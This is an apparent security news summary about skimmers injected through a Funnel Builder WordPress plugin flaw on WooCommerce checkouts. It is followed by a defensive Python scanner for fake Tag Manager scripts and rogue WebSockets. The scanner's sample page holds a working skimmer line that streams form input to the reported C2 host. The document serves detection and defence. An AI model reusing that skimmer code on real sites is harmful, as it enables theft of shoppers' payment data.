The Hacker News reports a critical vulnerability in the Funnel Builder WordPress plugin that has moved into active exploitation to skim payments on WooCommerce checkout pages. The flaw allows unauthenticated attackers to inject arbitrary JavaScript into every checkout page, so a skimmer can capture credit card numbers, CVVs, and billing addresses. A patch was released in version 3.15.0.3; all earlier versions are affected, and the plugin is installed on more than 40,000 WooCommerce stores, according to Sansec.
Attackers have been observed planting fake Google Tag Manager scripts in the plugin’s External Scripts setting. The injected code masquerades as analytics while loading the malicious skimmer and opening a WebSocket connection to the attacker’s C2 server at wss://protect-wss[.]com/ws.
The vulnerability stems from Funnel Builder’s public checkout endpoint and its permissive handling of internal methods, which lets an unauthenticated request write attacker-controlled data into the plugin’s global settings, producing the site-wide injection on checkout pages.
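The report gives defenders two concrete things to look for on a rendered checkout page: a script that presents itself as Google Tag Manager but is served from a host other than googletagmanager.com, and inline code that opens a WebSocket to a host the store never talks to (the article names protect-wss[.]com). The following scanner is an added example, not code from The Hacker News, Sansec or the Funnel Builder project; the sample checkout HTML, the store hostname shop.example.test and the fake loader host cdn.gtm-metrics.test are constructed for the demonstration, and the allowlists are assumptions a site operator would fill in for their own store.

```python
import re
from urllib.parse import urlparse

# Indicator reported for this campaign (article gives it defanged as wss://protect-wss[.]com/ws).
KNOWN_C2_HOSTS = {"protect-wss.com"}

# Hosts a genuine Google Tag Manager loader is served from.
LEGIT_GTM_HOSTS = {"www.googletagmanager.com", "googletagmanager.com"}

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
URL_RE = re.compile(r"""https?://[^\s"'`)]+""", re.IGNORECASE)
WS_RE = re.compile(r"""wss?://[^\s"'`)]+""", re.IGNORECASE)
GTM_HINT_RE = re.compile(r"googletagmanager|gtm\.js|GTM-[A-Z0-9]+", re.IGNORECASE)


def _host(url):
    """Lower-cased hostname of a URL; '' for relative (same-origin) references."""
    if url.startswith("//"):
        url = "https:" + url
    return (urlparse(url).hostname or "").lower()


def find_skimmer_indicators(html, script_host_allowlist=frozenset(), ws_allowlist=frozenset()):
    """Return (kind, url) findings for script tags that look like a checkout skimmer.

    script_host_allowlist: third-party hosts the store legitimately loads scripts from.
    ws_allowlist: hosts the checkout page is expected to open WebSockets to (usually none).
    """
    findings = []
    ok_script_hosts = LEGIT_GTM_HOSTS | set(script_host_allowlist)
    for attrs, body in SCRIPT_RE.findall(html):
        src_match = SRC_RE.search(attrs)
        if src_match:
            src = src_match.group(1)
            host = _host(src)
            if host == "":
                continue  # relative src: served by the store itself
            if GTM_HINT_RE.search(src) and host not in LEGIT_GTM_HOSTS:
                # Looks like a Tag Manager loader but is not served by Google.
                findings.append(("fake-gtm-src", src))
            elif host not in ok_script_hosts:
                findings.append(("unknown-external-script", src))
        elif GTM_HINT_RE.search(body):
            # Inline GTM bootstrap: the only URL it should inject is Google's gtm.js.
            for url in URL_RE.findall(body):
                if _host(url) not in LEGIT_GTM_HOSTS:
                    findings.append(("gtm-bootstrap-loads-foreign-host", url))
        # Exfiltration channel: any WebSocket endpoint embedded in inline code.
        for ws_url in WS_RE.findall(body):
            host = _host(ws_url)
            if host in KNOWN_C2_HOSTS:
                findings.append(("known-c2-websocket", ws_url))
            elif host not in ws_allowlist:
                findings.append(("unexpected-websocket", ws_url))
    return findings


# Constructed checkout page: one real GTM bootstrap, the store's own script,
# a fake Tag Manager loader from a foreign CDN, and an inline skimmer.
SAMPLE_CHECKOUT_HTML = """<html><head>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-EXAMPLE');</script>
<script src="https://shop.example.test/wp-content/plugins/woocommerce/assets/js/frontend/checkout.min.js"></script>
<script src="https://cdn.gtm-metrics.test/gtm.js?id=GTM-EXAMPLE"></script>
<script>var ws=new WebSocket("wss://protect-wss.com/ws");document.addEventListener("input",function(e){ws.send(e.target.name+"="+e.target.value)});</script>
</head><body>checkout form here</body></html>"""

SAMPLE_ALLOWLIST = {"shop.example.test"}  # assumption: the store's own domain


if __name__ == "__main__":
    for kind, url in find_skimmer_indicators(SAMPLE_CHECKOUT_HTML, SAMPLE_ALLOWLIST):
        print(f"{kind}: {url}")
```

Run it against the HTML fetched from a store's checkout URL (the skimmer only appears there, so scanning the home page finds nothing) and against the value stored in the plugin's External Scripts setting; both the fake loader and the C2 WebSocket are reported, while the genuine Tag Manager bootstrap and the store's own scripts pass. The host allowlist is the part that must be tuned per site; without it every third-party script is reported, which is noisy but still a safe default on a payment page.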